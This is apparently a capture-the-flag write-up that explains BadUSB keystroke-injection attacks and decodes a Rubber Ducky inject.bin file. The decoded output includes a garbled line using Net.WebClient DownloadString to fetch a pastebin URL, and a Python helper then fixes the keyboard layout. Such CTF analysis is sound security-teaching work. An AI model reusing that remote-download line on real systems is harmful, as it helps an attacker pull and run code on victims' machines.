Tags: rubber-ducky hid 

# HID

## Task

One of my colleagues found a USB stick in the parking lot in front of our company. Fortunately he handed it over directly to us. The drive contains an SD card with just one file. Maybe it's no normal USB flash drive?

File: inject.bin

Tags: binary-analysis

## Solution

A USB device can act as a HID (Human Interface Device): it looks like a USB stick, but is actually a keyboard. This is called a HID attack or BadUSB.

What you think you get: a filesystem.
What you get: a keyboard that launches malicious commands to take over your computer.

The tag is very misleading. This isn't binary analysis; we just need to find the tool that was used to encode these keyboard inputs.

A very popular device is the Rubber Ducky.

`The USB Rubber Ducky injects keystrokes at superhuman speeds`

While researching I came across this very interesting post: https://security.stackexchange.com/a/109595

It is definitely worth a read. There is also a link to a repository: https://github.com/brandonlw/Psychson#running-demo-1-hid-payload

The repository explains how to use the `Duckencoder` to encode the `Rubber Ducky format`. It also links to a decoder: https://github.com/midnitesnake/usb-rubber-ducky (forwarded from the Google URL).

We can use the `Decode/ducky-decode.pl` script to decode the `inject.bin`.

```bash
$ perl ducky-decode.pl -f inject.bin > decoded.txt
```

In the decoded file we find a lot of errors, like `windowstzle`. The keyboard layout is obviously wrong. We could fix that by changing the replacements in the script, but let's look for the flag first.

After scrolling down a lot and filtering out noise we find this:

`N e t . W e b C l i e n t ( . D o w n l o a d S t r i n g * | h t t p s > & & p a s t e b i n . c o m & r a w & Y R D 8 j s v d | ( < @`

Now we just need to replace `Y` with `Z`, `>` with `:`, `&` with `/` and open the correct URL. Done.
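The layout fix described above can be applied to the whole decoded file instead of by hand. This is an added example, not code from the original writeup or the decoder repository. It assumes the payload targets a German (QWERTZ) host, which is consistent with the three substitutions above; the function names are hypothetical.

```python
# Added example: re-read text that was decoded with a US key map as if the same
# physical keys had been pressed on a German (QWERTZ) host.
# Assumption: the target layout is German; the page only says the layout is wrong.

# Characters produced by the same physical keys, listed in the same order.
US_PLAIN = "abcdefghijklmnopqrstuvwxyz1234567890-=[];'`,./\\"
US_SHIFT = "ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+{}:\"~<>?|"
DE_PLAIN = "abcdefghijklmnopqrstuvwxzy1234567890ß´ü+öä^,.-#"
DE_SHIFT = "ABCDEFGHIJKLMNOPQRSTUVWXZY!\"§$%&/()=?`Ü*ÖÄ°;:_'"

# The tables must stay position-aligned, otherwise every later key is shifted.
assert len({len(US_PLAIN), len(US_SHIFT), len(DE_PLAIN), len(DE_SHIFT)}) == 1
US_TO_DE = str.maketrans(US_PLAIN + US_SHIFT, DE_PLAIN + DE_SHIFT)


def despace(line):
    """Undo the one-space-per-keystroke padding seen in the decoded line."""
    if len(line) > 2 and set(line[1::2]) == {" "}:
        return line[::2]
    return line


def us_to_de(text):
    """Translate US-decoded text to what a German-layout host would receive."""
    return despace(text).translate(US_TO_DE)


# Fragments quoted on this page.
PAGE_WORD = "windowstzle"
PAGE_LINE = ("N e t . W e b C l i e n t ( . D o w n l o a d S t r i n g * | "
             "h t t p s > & & p a s t e b i n . c o m & r a w & "
             "Y R D 8 j s v d | ( < @")

if __name__ == "__main__":
    print(us_to_de(PAGE_WORD))
    print(us_to_de(PAGE_LINE))
```

Keys that do not differ between the two layouts, such as `.`, pass through unchanged, which is why `pastebin.com` was already readable in the raw output.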

Original writeup (https://github.com/klassiker/ctf-writeups/blob/master/2020/syskron/hid.md).